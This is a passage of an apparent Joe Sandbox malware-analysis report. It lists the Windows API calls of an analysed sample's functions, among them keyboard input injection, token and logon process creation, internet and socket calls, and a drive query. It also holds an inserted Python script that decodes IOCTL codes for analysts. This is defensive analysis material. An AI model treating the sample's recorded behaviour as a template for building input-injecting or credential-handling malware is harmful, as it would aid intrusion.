• Instruction ID: 3eba861cbe89c6a167a3d6477e2a85db9355e6791f6c0d6d9377250d33f31516
• Opcode Fuzzy Hash: 7a28b1f7b5558bc3e3c7da67978f7e86df14428e2a2f95c43b55677644dd652d
• Instruction Fuzzy Hash: 99A16D352047019FC710EF15C495B6ABBE5FF48314F588459FA96AB3A2CB30ED44CBA6
APIs
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: 71491af8b76f4de25785c85a677b9bc885cca877470e0d993602836ecec85210
• Instruction ID: 8e5de4ae6e046d9ee3df3bcd59d4227fc62b54d6cd8c39ebdeca48c74fb6bc02
• Opcode Fuzzy Hash: 71491af8b76f4de25785c85a677b9bc885cca877470e0d993602836ecec85210
• Instruction Fuzzy Hash: E851A8306043069BDB24AF76D4A16EEB3E5EF44314F20A81FE566EB2D3DB7098C09721
APIs
• GetWindowRect.USER32(01095F30,?), ref: 00E4C544
• ScreenToClient.USER32(?,00000002), ref: 00E4C574
• MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00E4C5DA
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 067ac3c6a541020e00f0175b4f8a28fc675f6b19238d439f8e2eebe7e6b86779
• Instruction ID: 760dccaac65b243504c150b99ca246c6db536417c300fe8e392b90fc8adea18d
• Opcode Fuzzy Hash: 067ac3c6a541020e00f0175b4f8a28fc675f6b19238d439f8e2eebe7e6b86779
• Instruction Fuzzy Hash: 01517071A01104EFCF10DF69E8809AE7BB5EB49764F209299F915EB290D770ED41CB90
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00E1C462
• __itow.LIBCMT ref: 00E1C49C
  • Part of subcall function 00E1C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00E1C753
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 00E1C505
• __itow.LIBCMT ref: 00E1C55A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: 877a8c9a77a9b336adb7274b84d688ec0f034a02cda4326532ac5d5b14decac8
• Instruction ID: 9661ec1d5022d0a5b5db03a182c25dd02e0c2ade0c28629f7fa37b536be09c50
• Opcode Fuzzy Hash: 877a8c9a77a9b336adb7274b84d688ec0f034a02cda4326532ac5d5b14decac8
• Instruction Fuzzy Hash: CF41D171A00208AFDF21EF54C852BEE7BBAEF48744F001059FA05F7281DB709A858BB1
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00E23966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00E23982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00E239EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00E23A4D
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: a602950ca8eb54aaff8173248cd77d2ac62d1a8de7c65966d791c7ef13538ac6
• Instruction ID: b30382196a74dfe4784ef87711a616370d3ce653bf5d1a4d1caa3bd239d61021
• Opcode Fuzzy Hash: a602950ca8eb54aaff8173248cd77d2ac62d1a8de7c65966d791c7ef13538ac6
• Instruction Fuzzy Hash: 0D412770E04228AEEF218B75A8057FDBBB99B96315F04211AE5C2721C1C7BC8EC4DB65
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00E2E742
• GetLastError.KERNEL32(?,00000000), ref: 00E2E768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00E2E78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00E2E7B9
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• String ID:
• API String ID: 3321077145-0
• Opcode ID: 1e7706acdc7f2d5d0059dc2709ca988ee292f8cb9547fe7bc2a117f6817bb9d7
• Instruction ID: 026f971aa2f362c855f3f631cb2c61aeddab880f8d9c4c9b858c4361932d5cad
• Opcode Fuzzy Hash: 1e7706acdc7f2d5d0059dc2709ca988ee292f8cb9547fe7bc2a117f6817bb9d7
• Instruction Fuzzy Hash: 97415A39600660DFCF11EF16D954A5DBBE5FF59710B198099E946AB3A2CB70FC00CBA1
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00E4B5D1
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• ClientToScreen.USER32(?,?), ref: 00E4D807
• GetWindowRect.USER32(?,?), ref: 00E4D87D
• PtInRect.USER32(?,?,00E4ED5A), ref: 00E4D88D
• MessageBeep.USER32(00000000), ref: 00E4D8FE
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
APIs
• GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00E23AB8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 00E23AD4
• PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00E23B34
• SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00E23B92
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00E14038
• __isleadbyte_l.LIBCMT ref: 00E14066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E14094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00E140CA
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E34358
  • Part of subcall function 00E343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00E34401
  • Part of subcall function 00E343E2: InternetCloseHandle.WININET(00000000), ref: 00E3449E
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
APIs
• GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00E1AFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 00E1AFB5
• CloseHandle.KERNEL32(00000004), ref: 00E1AFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E1AFFE
Similarity
• API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
• String ID:
• API String ID: 2621361867-0
APIs
• select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00E38AE0
• __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00E38AF2
• accept.WS2_32(00000000,00000000,00000000), ref: 00E38AFF
• WSAGetLastError.WS2_32(00000000), ref: 00E38B16
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 00E48AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E48AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 00E48ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00E48ADC
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
                                                                                                                  • Opcode ID: c36be384cc7b4e534eea1d35297e210c9d3891264ee733234ff97ddae0c0ca07
                                                                                                                  • Instruction ID: 4c4a305b231c16f8679a727b33b004979aea496bb3152c66190b22738983f02c
                                                                                                                  • Opcode Fuzzy Hash: c36be384cc7b4e534eea1d35297e210c9d3891264ee733234ff97ddae0c0ca07
                                                                                                                  • Instruction Fuzzy Hash: EA11BE31745110AFE744AB29ED05FBE7799EF85320F284119F926E72E1CFB0AC0097A4
APIs
  • Part of subcall function 00E21E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00E20ABB,?,?,?,00E2187A,00000000,000000EF,00000119,?,?), ref: 00E21E77
  • Part of subcall function 00E21E68: lstrcpyW.KERNEL32(00000000,?,?,00E20ABB,?,?,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E21E9D
  • Part of subcall function 00E21E68: lstrcmpiW.KERNEL32(00000000,?,00E20ABB,?,?,?,00E2187A,00000000,000000EF,00000119,?,?), ref: 00E21ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E20AD4
• lstrcpyW.KERNEL32(00000000,?,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E20AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,00E2187A,00000000,000000EF,00000119,?,?,00000000), ref: 00E20B2E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
• Opcode ID: 7c12fbd8e9dfeed687bf7b588d62962939d06a32acc6cb64ad589a10f65e0f39
• Instruction ID: 3e65dd55820eccd385b591c520577f9acfc1150057d2323f4bbf4b25f54d9dc5
• Opcode Fuzzy Hash: 7c12fbd8e9dfeed687bf7b588d62962939d06a32acc6cb64ad589a10f65e0f39
• Instruction Fuzzy Hash: 6711B636200315AFDB25AF34EC45E7A77A8FF49354B80506AF906DB291EB71D950C7A0
APIs
• _free.LIBCMT ref: 00E12FB5
  • Part of subcall function 00E0395C: __FF_MSGBANNER.LIBCMT ref: 00E03973
  • Part of subcall function 00E0395C: __NMSG_WRITE.LIBCMT ref: 00E0397A
  • Part of subcall function 00E0395C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001), ref: 00E0399F
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: fb714c757364b7c2553544895f031bd25f807d71677c6d9ebf069ce7ae4c5953
• Instruction ID: 691df49031def0d9902e12efeae90e62ddc38c76dc486353319c8c912901823a
• Opcode Fuzzy Hash: fb714c757364b7c2553544895f031bd25f807d71677c6d9ebf069ce7ae4c5953
• Instruction Fuzzy Hash: 8C1150319082119FDB313F70AC446DE7BD4AF4C3A4F206819F949BA191CB30CCD08790
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00E205AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00E205C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00E205DD
• FreeLibrary.KERNEL32(?), ref: 00E20632
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
• Opcode ID: 08c8cfdfb0c56beccb55dc4029c0e9f3df4d4bdf0ef181c00f48a9b88d11412b
• Instruction ID: 6773772e094ff07d73bb846b7b46a27daa25fca2b654334527e906107e68ae1b
• Opcode Fuzzy Hash: 08c8cfdfb0c56beccb55dc4029c0e9f3df4d4bdf0ef181c00f48a9b88d11412b
• Instruction Fuzzy Hash: 4521B471A40228EFDB20CF91FC88ADBBBB8EF40704F009469E516B2491DBB1EA54DF50
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E26733
• _memset.LIBCMT ref: 00E26754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E267A6
• CloseHandle.KERNEL32(00000000), ref: 00E267AF
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
• Opcode ID: c136987f857a403ca2f3e8e41e84873808d8a4221b15eeea154900bcbf1324ad
• Instruction ID: 0abbbf535e20c5c3817c4797db6acb88c152a7ccc350cd00c528a6b880401f68
• Opcode Fuzzy Hash: c136987f857a403ca2f3e8e41e84873808d8a4221b15eeea154900bcbf1324ad
• Instruction Fuzzy Hash: F711A775D012287AE72057A5BC4DFABBABCEF44764F10429AF504F71D0D6744E848B74
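The DeviceIoControl call in the listing above passes the raw control code 0004D02C with 512-byte input and output buffers, after a CreateFileW with GENERIC_READ|GENERIC_WRITE (C0000000) and OPEN_EXISTING (00000003). Reading such a call requires unpacking the CTL_CODE fields, which the report does not do. The script below is an added example, not part of the Joe Sandbox report or of the sample; it implements the CTL_CODE layout from winioctl.h ((DeviceType << 16) | (Access << 14) | (Function << 2) | Method) and carries a small hand-picked table of storage IOCTLs rebuilt from their header definitions. The trace line it parses is copied from the listing; the function and class names are my own.

```python
"""Decode Windows I/O control codes found in sandbox API traces.

CTL_CODE(DeviceType, Function, Method, Access) from winioctl.h packs its
four fields as (DeviceType << 16) | (Access << 14) | (Function << 2) | Method,
so every field can be recovered from the raw value a trace shows.
Added example; stdlib only.
"""
from dataclasses import dataclass
from typing import Optional

# Partial table of FILE_DEVICE_* values from winioctl.h (illustrative subset).
DEVICE_TYPES = {
    0x04: "FILE_DEVICE_CONTROLLER",   # IOCTL_SCSI_BASE in ntddscsi.h
    0x07: "FILE_DEVICE_DISK",
    0x09: "FILE_DEVICE_FILE_SYSTEM",
    0x12: "FILE_DEVICE_NETWORK",
    0x22: "FILE_DEVICE_UNKNOWN",
    0x2D: "FILE_DEVICE_MASS_STORAGE",  # IOCTL_STORAGE_BASE
}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS",
          2: "FILE_WRITE_ACCESS", 3: "FILE_READ_ACCESS | FILE_WRITE_ACCESS"}


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python equivalent of the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# Well-known storage codes, built with ctl_code() from the arguments used in
# ntddscsi.h / winioctl.h so the table cannot drift from the macro.
KNOWN_IOCTLS = {
    ctl_code(0x04, 0x0401, 0, 3): "IOCTL_SCSI_PASS_THROUGH",
    ctl_code(0x04, 0x0405, 0, 3): "IOCTL_SCSI_PASS_THROUGH_DIRECT",
    ctl_code(0x04, 0x040A, 0, 3): "IOCTL_IDE_PASS_THROUGH",
    ctl_code(0x04, 0x040B, 0, 3): "IOCTL_ATA_PASS_THROUGH",
    ctl_code(0x04, 0x040C, 0, 3): "IOCTL_ATA_PASS_THROUGH_DIRECT",
    ctl_code(0x07, 0x0000, 0, 0): "IOCTL_DISK_GET_DRIVE_GEOMETRY",
    ctl_code(0x07, 0x0022, 0, 3): "SMART_RCV_DRIVE_DATA",
    ctl_code(0x2D, 0x0500, 0, 0): "IOCTL_STORAGE_QUERY_PROPERTY",
}


@dataclass(frozen=True)
class Ioctl:
    raw: int
    device_type: int
    function: int
    method: int
    access: int

    @property
    def name(self) -> str:
        return KNOWN_IOCTLS.get(self.raw, "unknown")

    def describe(self) -> str:
        dev = DEVICE_TYPES.get(self.device_type, f"0x{self.device_type:X}")
        return (f"0x{self.raw:08X} = {self.name}: device={dev}, "
                f"function=0x{self.function:03X}, method={METHODS[self.method]}, "
                f"access={ACCESS[self.access]}")


def decode_ioctl(raw: int) -> Ioctl:
    """Split a raw control code into its four CTL_CODE fields."""
    raw &= 0xFFFFFFFF
    return Ioctl(
        raw=raw,
        device_type=(raw >> 16) & 0xFFFF,
        access=(raw >> 14) & 0x3,
        function=(raw >> 2) & 0xFFF,   # 12-bit function number
        method=raw & 0x3,
    )


def decode_trace_line(line: str) -> Optional[Ioctl]:
    """Extract dwIoControlCode (2nd argument) from a DeviceIoControl trace line."""
    if "DeviceIoControl" not in line:
        return None
    args = line.split("(", 1)[1].split(")", 1)[0].split(",")
    return decode_ioctl(int(args[1], 16))


if __name__ == "__main__":
    # Trace line copied from the function listing above.
    sample = ("DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,"
              "?,00000000), ref: 00E267A6")
    print(decode_trace_line(sample).describe())
```

Running it on the listed call yields device type FILE_DEVICE_CONTROLLER, function 0x40B, METHOD_BUFFERED and read/write access, which is the encoding of IOCTL_ATA_PASS_THROUGH. The 0x200-byte buffers match the 512-byte ATA IDENTIFY DEVICE response, so the call is consistent with an ATA identify query on a physical drive handle; the report itself does not say what the sample does with the result.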
APIs
  • Part of subcall function 00E1AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E1AA79
  • Part of subcall function 00E1AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E1AA83
  • Part of subcall function 00E1AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E1AA92
  • Part of subcall function 00E1AA62: RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00E1AA99
  • Part of subcall function 00E1AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E1AAAF
• GetLengthSid.ADVAPI32(?,00000000,00E1ADE4,?,?), ref: 00E1B21B
• GetProcessHeap.KERNEL32(00000008,00000000), ref: 00E1B227
• RtlAllocateHeap.NTDLL(00000000), ref: 00E1B22E
• CopySid.ADVAPI32(?,00000000,?), ref: 00E1B247
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 259861997-0
• Opcode ID: 0036b77722edee096e2a2e3225d02715c4d2470069bb2b329748fe962988d4ca
• Instruction ID: 45644ed756ed16f09c9d4c725e641414d298eaa441a0a961154bc3aef45fd21c
• Opcode Fuzzy Hash: 0036b77722edee096e2a2e3225d02715c4d2470069bb2b329748fe962988d4ca
• Instruction Fuzzy Hash: B61182B1A01205AFDB049F54DD85AEFB7A9EF85348F14902DE542E7221D771AE88CB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 00E1B498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1B4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1B4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 00E1B4DB
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: fb59d5f7cc3acf159cd4c04b488a533aecb1777743a6936b9e5d8ab9b2710395
• Instruction ID: cb095a41eacd6e64190d669ee7c19ab8f1c332e8e8d1172045880a0da14e6c38
• Opcode Fuzzy Hash: fb59d5f7cc3acf159cd4c04b488a533aecb1777743a6936b9e5d8ab9b2710395
• Instruction Fuzzy Hash: D711487A900218FFDB11DFA9C881EDDBBB4FB08710F208091E614B7290D771AE50DB94
APIs
• GetCurrentThreadId.KERNEL32 ref: 00E27352
• MessageBoxW.USER32(?,?,?,?), ref: 00E27385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00E2739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00E273A2
Memory Dump Source
• Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
• Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DFD1BA
• GetStockObject.GDI32(00000011), ref: 00DFD1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00DFD1D8
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
APIs
Similarity
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
APIs
  • Part of subcall function 00E07A0D: __getptd_noexit.LIBCMT ref: 00E07A0E
• __lock.LIBCMT ref: 00E0748F
• InterlockedDecrement.KERNEL32(?), ref: 00E074AC
• _free.LIBCMT ref: 00E074BF
• InterlockedIncrement.KERNEL32(01095720), ref: 00E074D7
Similarity
• API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
• String ID:
• API String ID: 2704283638-0
APIs
• __lock.LIBCMT ref: 00E07AD8
  • Part of subcall function 00E07CF4: __mtinitlocknum.LIBCMT ref: 00E07D06
  • Part of subcall function 00E07CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00E07D1F
• InterlockedIncrement.KERNEL32(?), ref: 00E07AE5
• __lock.LIBCMT ref: 00E07AF9
• ___addlocaleref.LIBCMT ref: 00E07B17
Similarity
• API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
• String ID:
• API String ID: 1687444384-0
APIs
  • Part of subcall function 00DFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DFAFE3
  • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFAFF2
  • Part of subcall function 00DFAF83: BeginPath.GDI32(?), ref: 00DFB009
  • Part of subcall function 00DFAF83: SelectObject.GDI32(?,00000000), ref: 00DFB033
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00E4EA8E
• LineTo.GDI32(00000000,?,?), ref: 00E4EA9B
• EndPath.GDI32(00000000), ref: 00E4EAAB
• StrokePath.GDI32(00000000), ref: 00E4EAB9
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00E1C84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00E1C85D
• GetCurrentThreadId.KERNEL32 ref: 00E1C864
• AttachThreadInput.USER32(00000000), ref: 00E1C86B
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
APIs
• GetCurrentThread.KERNEL32 ref: 00E1B0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00E1AC9D), ref: 00E1B0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00E1AC9D), ref: 00E1B0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00E1AC9D), ref: 00E1B0F1
                                                                                                                  Similarity
                                                                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974789173-0
                                                                                                                  • Opcode ID: 1a17ca471673ac243f504b9f0dd72604ff133d2fec54a2677ec1afb891799eb5
                                                                                                                  • Instruction ID: ecaeb9d3ff17d3fdd8899b79b53085cf8b44e12e5508c5fbcfee3191d962a31f
                                                                                                                  • Opcode Fuzzy Hash: 1a17ca471673ac243f504b9f0dd72604ff133d2fec54a2677ec1afb891799eb5
                                                                                                                  • Instruction Fuzzy Hash: 18E04F32B05212DFD7601FB36C0CB873BA9EF597D5F018818E241E6040DAA484458760
APIs
• GetSysColor.USER32(00000008), ref: 00DFB496
• SetTextColor.GDI32(?,000000FF), ref: 00DFB4A0
• SetBkMode.GDI32(?,00000001), ref: 00DFB4B5
• GetStockObject.GDI32(00000005), ref: 00DFB4BD
